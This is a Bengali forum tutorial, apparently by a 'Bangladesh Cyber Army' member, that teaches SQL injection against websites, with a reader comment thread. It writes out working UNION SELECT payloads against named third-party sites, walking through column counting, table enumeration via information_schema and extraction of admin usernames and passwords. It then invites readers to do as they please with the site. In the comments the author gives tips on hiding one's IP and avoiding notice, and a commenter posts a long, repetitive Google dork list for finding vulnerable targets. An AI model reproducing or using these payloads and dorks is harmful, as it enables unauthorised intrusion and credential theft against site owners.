ওয়েব সাইট হ্যাক করুন SQL ইঞ্জেকশন দিয়ে (সাইট হ্যাক হবে চোখের পলকে) বাংলায় হ্যাকিং-পর্বঃ ১

বাংলায় হ্যাকিং

SQL

SQL Inj3cti0n কি ?

সহজ ভাষায় বলতে গেলে SQL Inj3cti0n হলো এমন একটি code inj3cti0n কৌশল যা কোনো সাইটের ডাটাবেজের সিকিউরিটি কে ভেঙ্গে তা থেকে ইনফরমেশন বের করতে পারে।

যে কোনো সাইটে SQL Inj3cti0n করা যাবে ?

না। SQL Inj3cti0n তখনি কাজ করবে যখন কোনো সাইটে SQL error থাকবে।

কোনো সাইটে SQL error আছে কি নেই তা বুজবো কিভাবে ?

যেই সব সাইটে id=value থাকে ধরুন
http://www.site.com/news.php?id=5
সাধারণত এই সব সাইটে SQL error থাকে। কোনো সাইটে SQL error এভাবেই দেখাবে না, error দেখার জন্য আপনাকে url এর শেষে একটি '(string) দিতে হবে।

উদাহরণঃ http://www.bayviewhotelni.com/news.php?id=3 এটি হচ্ছে আসল লিঙ্ক, এই লিঙ্কে যখন আপনি ব্রাউজারে লোড করবেন তখন কোনো error আসবে না। যখন আপনি url এর শেষে একটি '(string) দিবেন তখন ঠিকই error আসবে।

http://www.bayviewhotelni.com/news.php?id=3'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3''' at line 1
অথবা অনেক সময় দেখতে পারবেন যখন ' বসিয়েছেন তখন সাইটে যদি কোনো ছবি/ডাটা মিস করে তাহলে ও অই সাইটে SQL error আছে।

অর্থাৎ বোঝা গেলো এই সাইটে SQL error আছে। তাই আমরা এই সাইটটি কে SQL Inj3cti0n করেন হ্যাক করতে পারবো।

কিভাবে SQL inj3ction করবো কোনো সাইটকে ?

প্রথমে আমরা মজিলাতে একটি এডন ইন্সটল করবো যার নাম হচ্ছে HaCkBar. এই এডনটি ব্যবহার করলে কিছু কমান্ড দিতে সহজ হয়।
ডাউনলোড করে নিন এখান থেকে : https://addons.mozilla.org/en-us/firefox/addon/hackbar/

ইন্সটল করার পরেই দেখবেন আপনার ব্রাউজারে এডনটি দেখা যাচ্ছে।

সাইটের মোট কলাম নাম্বার বের করার নিয়ম :-

আপনি যখন SQL error কোনো সাইটকে SQL Inj3cti0n করতে যাবেন তখন আপনার প্রথম কাজ হবে সাইটের ডাটাবেজে মোট কয়টি কলাম আছে তা বের করা। আর বের করার পদ্ধতি হলো order by কমান্ড।

http://www.sparkleappealdorset.org/supporter.php?id=7 order by 1--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 2--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 3--

এভাবে যেতে থাকবেন যতক্ষণ পর্যন্ত কোনো Err0r না আসে।

http://www.sparkleappealdorset.org/supporter.php?id=7 order by 11--
দিলে কিছু লিখা অদৃশ্য হয়ে যায় অর্থাৎ এই সাইটটিতে মোট 10 টি কলাম আছে।

Vulnerable কলাম বের করার নিয়ম :-

এখন আমাদের দেখতে হবে এই সাইটের ১০ টি কলামের মধ্যে কতটি কলাম vulnerable. যেই সব কলাম vulnerable সেই সব কলাম থেকেই ডাটাবেজ এর ইনফরমেশন বের করা যাবে। আমরা Union Select কমান্ড ব্যবহার করে সাইটের vulnerable কলাম গুলা বের করবো।
প্রথমে union select তারপরে যে কইটি কলাম সে কলাম গুলা ঠিক এভাবে বসাতে হবে। আর id=value er আগে একটি - চিহ্ন বসাতে হবে যেমন- http://www.sparkleappealdorset.org/supporter.php?id=-7

http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,2,3,4,5,6,7,8,9,10--

ডাটাবেজ ভার্শন বের করার নিয়ম:-

যে কোনো একটি vulnerable কলামে আমরা SQL কমান্ড বসাবো যাতে আমরা ডাটাবেজের ইনফরমেশন বের করতে পারি। কোনো সাইটের ডাটাবেজ এর ভার্শন যদি 4 হয় তাহলে তা ম্যানুয়ালি inj3ct করা যাবে না। তখন টুলস ব্যবহার করতে হবে like havij । আর যদি 5 হয় তাহলে আমরা ম্যানুয়ালি inj3ct করতে পারবো।

এই সাইটটিতে অনেক গুলা vulnerable কলাম আমাদের যে কোনো একটিকে বাছাই করে নিতে হবে।

ধরি আমরা ২ নাম্বার কলাম থেকে ডাটাবেজ ভার্শন বের করবো।

তাহলে syntax টি হবে

http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,version(),3,4,5,6,7,8,9,10--

vulnerable কলামে version() রিপ্লেস করলেই ডাটাবেজের ভার্শন চলে আসবে।

ডাটাবেজ থেকে টেবিল বের করার নিয়ম :-

vulnerable কলামের জাগায় group_concat(table_name) এবং এক দম শেষ কলামের পরে from information_schema.tables where table_schema=database()--

তাহলে syntax টি দাড়ায়

http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--

যে টেবিল গুলো আমরা পেলাম তা হলো event,galleryImage,login_admin,supporter

এখানে এডমিন টেবিল হচ্ছে login_admin, এই টেবিল থেকে আমরা এডমিনের ইউসার এবং পাসওয়ার্ড বের করবো।

এডমিন টেবিল থেকে ইউজার এবং পাসওয়ার্ড বের করার নিয়ম :-

vulnerable কলামের জাগায় group_concat(column_name) এবং এক দম শেষ কলামের পরে from information_schema.columns where table_name=0xএডমিন টেবিল নামের হেক্স কোড--

তাহলে syntax টি দাড়ায়

http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--

এডমিন ইউসার এবং পাসওয়ার্ড বের করার নিয়ম :-

vulnerable কলামের জাগায় concat{যে কলাম গুলো পেয়েছেন সে গুলো(সব গুলো কলাম নয় সুধু মাত্র ইউসার এবং পাসওয়ার্ড এর কলাম)} এবং এক দম শেষ কলামের পরে কোন টেবিল থেকে এই কলাম পেয়েছেন সেই টেবিলের নাম।

http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,concat(uid,0x3a,pwd),3,4,5,6,7,8,9,10 from login_admin--

বাস পেয়ে গেলেন সাইটের এডমিন পাসওয়ার্ড । এখন পুরো সাইটি আপনার হাতে যা খুশি তাই করুন। তবে মারাত্মক কোনো ক্ষতি না করাই ভালো। সহজেই হয়ে গেলেন একজন ওয়েব হ্যাকার 😛

কিছু কথাঃ এই টপিকটা সহজভাবে বোঝানোর চেস্টা করেছি তাই ভাল লাগলে অবশ্যই ধন্যবাদ জানাবেন xD

বিঃদ্রঃ এই পোস্টটির কপিরাইট সম্পূর্ণ সংরক্ষিত এবং বাংলাদেশ সাইবার আর্মি এর অনুমতি ছাড়া আর কোথাও এটা লিখা/পোস্ট করা যাবে না।

We Are Bangladesh Cyber Army 😀

Level New

আমি Script Kiddie। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 14 বছর 8 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 6 টি টিউন ও 199 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 2 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

who am i ?


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

টিউনতো নয় যেন আগুনেরই গোলা 😀 😀 😛 😆

বস একদম ফাটায়া দিলেন …………….ধন্ন

Level 0

ইন্টারনেট এস্কপ্লোরার ও গুগল ক্রোমে পদ্ধতিটা কাজ করবেনা ? যার সাইট হ্যাক করব সেকি বুঝতে পারবে যে তার সাইট হ্যাক হয়েছে ।

    Level New

    করবে তবে hackbar এডনটি কাজ করবে না, শুধু মজিলা এবং কমেটবার্ড এ এই এডনটি কাজ করে।

বোমা ফাটছে !!!

    Level New

    কই তোমার মাথায় ? 😛

ভাই একবারে ফাটাইয়া দিছেন তো।

    Level New

    একজন তো আমাকে ফাটাইতে নিসিলো 😛 ধন্যবাদ আপনার কমেন্টের জন্য।

চলুক 🙂

    Level New

    চলতে থাকলাম। সাম্য ভাই ভালো আছেন ?

বিরাট সুন্দর ……… ধন্যবাদ

    Level New

    আপনাকেও ধন্যবাদ।

vai..j0tilz akta tune k0rchan…

    Level New

    আপনাকেও জটিল ধন্যবাদ।

Vaiya, jar site hack hobe, se ke bujta parbe ka hack korase???

    Level New

    হা বুঝবে যদি এডমিন প্যানেল এর আইপি লগ চেক করে + যদি আপনি সাইটে লিখে দেন হ্যাকড বাই Disitalman. bd তাহলে তো সহজেই বোঝার কথা।

Level 0

মুইও সাইবার আর্মি হইতাম চাই। কিন্তু কিচ্ছু পারি না!!! 🙁 🙁 🙁 🙁 🙁

    Level New

    চেস্টা করে দেখুন হতে কতক্ষণ । 😉

joss !!! ami ai prothom karo tunes pore comment korlam.
Excellent tunes.
we need more………..

    Level New

    আশা করি সামনে আরো ভাল টিউন পাবেন। পাশে থাকুন।

Level 0

খুব কম টিউন দেখেই এত খুশি হইছি। বেশী জোশশশশশশ হইছে। চালায়া যাবেন বলে আশা রাখি। 🙂

    Level New

    আমিও খুশি জেহুতু আপনি আমার টিউনে খুশি হইসেন।

….

এই রকম টিউন আরো চাই । sql নিয়ে চেইন টিউন করেন । অনেকের উপকার হবে

    Level New

    হুম করার চেস্টা করবো।

    আশা করি তাড়াতাড়ি পাব! ধন্যবাদ ভালো থাকবেন

দারুন লিখেছেন। সেইদিনই বুঝেছিলাম আপনি বস 😀

    Level New

    ধন্যবাদ রাসেদ ভাই।

পুরাই ফিদা!!!

Level 0

টিউনার ভাই যার সাইট হ্যাক করব সে কি খোজ পাবে তার সাইট হ্যাক হয়েছে ।

    Level New

    সাধারনত তারা পায় না যদি আপনি হোম ডিফেস্মেন্ট না করেন। 😛

Level New

জিটল হইেছ…….চািলেয় যান

    Level New

    ধন্যবাদ Rupom Mariner ভাই।

চরম হইসে।
আরও চাই।
প্রিয়তে রাখলাম।
আপনারে ই দরকার।

    Level New

    আরো দিমু নো টেনশন ।

ব্যপক জটিল আর ঐ সব সাইটের জন্য কুটিলও বটে<?

    Level New

    আপনার কমেন্ট বুজলাম না মাহাবুব ভাই। 😛

Sql inject এর total doc's গুলা দিয়ে দিলাম। খুজে নিয়ে হামলা চালান। 😀

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

    মারাত্মক

    আচ্ছা হ্যাক করার পর যদি আমার সাইন থেকে যায়,বা আমাকে সনাক্ত করে ফেলে তাহলেতো সমসশা।কি করা যায়?

    Level New

    পরের পর্বে থাকবে কিভাবে Dork থেকে সাইটে হামলা চালানো হয়। 😛

    Level New

    @dip mazumder bro: আপনার আইপি হাইড করে রাখুন তাহলেই তো হয়।

Level 0

josssssshhhhh হইসে । ধন্যবাদ । আমি Windows 7 use করি । Windows Explorer.exe এর problem এর কারনে PC রিস্টার্ট নেয় । এটা কি কারণে হয় তা জানতে চাই ? এবং এর সমাধান চাই । কোন উপায় থাকলে জানাবেন ।

    Level New

    ভাইরাসের জন্য হতে পারে। এন্টিভাইরাস দিয়ে পিসিকে স্কান মারুন।

চালাইয়া যান… 😀

খুব ভাল…..খুব ভাল….. এটাইতো দেখতে চাই …… BCA এর প্রতি শুভ কামনা সবসময় থাকবে। আমার একটি আবেদন আপনারা সবাইকে হ্যাকিং শেখান। বাংলাদেশের প্রতিটি ঘরে যেন একজন করে ইথিক্যাল হ্যাকার থাকে, যাতে করে অন্যের ক্ষতির হাত থেকে নিজে ও দেশের সাইবার ক্ষেত্রকে বাচানো যায়…

    Level New

    আপনার কমেন্ট টা পরে অনেক ভালো লাগলো। আমরা চেস্টা করে যাবো বাকিটা আপনাদের উপর। আপনারা পাশে থাকলে সব কিছুই সম্ভভ 😀

আরে মিয়া, তোমারে বহুতদিন পর দেখলাম। ফাটাফাটি টিউন। সরাসরি প্রিয়তে

    Level New

    আরে মিয়া পরীক্ষা আসিলো। তাই বহু দিন পরে আসলাম ।

Level New

মাথা ঘুরাচ্ছে

    Level New

    এতা কি কোন ? মাথা ঘুরায় কেন ? নাপা খান 😛

এখানে অল্প কিছুদিন ভিজিট করছি। সেজন্যে আমার যদি ভুল হয় তাহলে মাফ করবেন। আসলে আমি বলতে চাইছি যে এখানে অনেক হ্যাকিং টিউটোরিয়াল দেখলাম। যারা এগুলো দিচ্ছে তারা হয়তো ভালোর জন্যেই দিচ্ছে। কিন্তু, কথা হল এই টিওটোরিয়াল গুলির ব্যাবহার যদি সঠিক না হয়?? ইথিক্যাল হ্যাকিং কয়জন মনে রাখে?? কিছুদিন আগে আমি একজনকে Sql inject বোঝালাম আর সে কি করলো জানেন?? বাংলাদেশ এর একটা নামকরা টিভি চ্যানেল এর ওয়েব সাইট হ্যাক দিলো।

আমার উপর আবার রাগ করবেন না। নতুনদের ধংস করতে না শিখিয়ে গড়তে শেখান কি ভালো না?? আপনি হয়ত শেখাচ্ছেন সতর্ক করার জন্যে। কিন্ত অন্যেরা সেটার ব্যাবহার করতে পারে অন্যের ক্ষতির উদ্দেশ্যে।

